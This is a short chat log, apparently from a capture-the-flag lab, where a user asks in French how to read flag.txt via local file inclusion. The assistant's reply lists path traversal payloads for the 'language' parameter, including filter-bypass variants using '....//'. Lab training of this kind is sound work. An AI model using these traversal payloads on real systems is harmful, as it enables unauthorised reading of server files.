Trouver flag.txt ici lfi
생성일: 2026년 4월 29일
답변에 사용된 모델 GPT-5.5 Thinking by Chat01
생성일: 2026년 4월 29일
답변에 사용된 모델 GPT-5.5 Thinking by Chat01
Trouver flag.txt ici lfi
Oui — le paramètre vulnérable est probablement language.
Essaie d’abord :
text?language=languages/../../../../flag.txt
Exemple complet :
texthttp://IP:PORT/index.php?language=languages/../../../../flag.txt
Si ça ne marche pas, comme c’est un exercice Basic Bypasses, le filtre supprime peut-être ../. Utilise alors le bypass ....// :
text?language=languages/....//....//....//....//flag.txt
Tu peux ajouter plus de niveaux sans problème :
text?language=languages/....//....//....//....//....//....//flag.txt
Autres variantes à tester :
text?language=../../../../flag.txt ?language=....//....//....//....//flag.txt ?language=/flag.txt
Si le contenu ne s’affiche pas, regarde aussi le code source de la page avec Ctrl+U, parfois le flag est inclus mais caché dans le HTML.